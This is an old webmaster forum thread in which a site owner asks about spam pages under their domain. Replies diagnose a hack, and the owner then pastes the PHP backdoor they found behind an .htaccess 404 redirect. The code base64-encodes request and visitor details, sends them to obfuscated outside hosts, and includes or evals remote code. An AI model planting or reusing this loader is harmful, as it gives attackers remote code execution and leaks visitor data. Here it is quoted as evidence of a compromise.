Odd search results?

Discussion in 'Google' started by zybron, Feb 19, 2008.

  1. #1
    When doing a site:mydomain.com search on Google I noticed some odd results:

    [​IMG]

    Does anyone know how these pages that are not on my site show up in Google for my site?
     
    zybron, Feb 19, 2008 IP
  2. adamjthompson

    adamjthompson Well-Known Member

    Messages:
    1,242
    Likes Received:
    59
    Best Answers:
    0
    Trophy Points:
    125
    #2
    Yup. Looks like someone has hacked your site and injected/uploaded content to your site. :eek:
     
    adamjthompson, Feb 19, 2008 IP
  3. corlock

    corlock Banned

    Messages:
    538
    Likes Received:
    9
    Best Answers:
    0
    Trophy Points:
    0
    #3
    I think there's a bug with your site...or just what he said, has been hacked...
     
    corlock, Feb 19, 2008 IP
  4. zybron

    zybron Peon

    Messages:
    199
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    0
    #4
    I think you may be correct. When I initially looked in the directory I didn't see anything suspicious but I checked out my .htaccess file and realized it was redirecting 404's to a php file with some suspicious code:

    
    <? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("YS5yc2RjcmFmdC53cw==")."/?".$str))); else if (include(base64_decode("aHR0cDovLw==").base64_decode("YWQucnVud2ViLmluZm8=")."/?".$str)); else eval(file_get_contents(base64_decode("aHR0cDovLzcueG1sZGF0YS5pbmZvLz8=").$str)); ?>
    
    PHP:
    I guess somewhere along the lines my .htaccess was writable. :eek:
     
    zybron, Feb 19, 2008 IP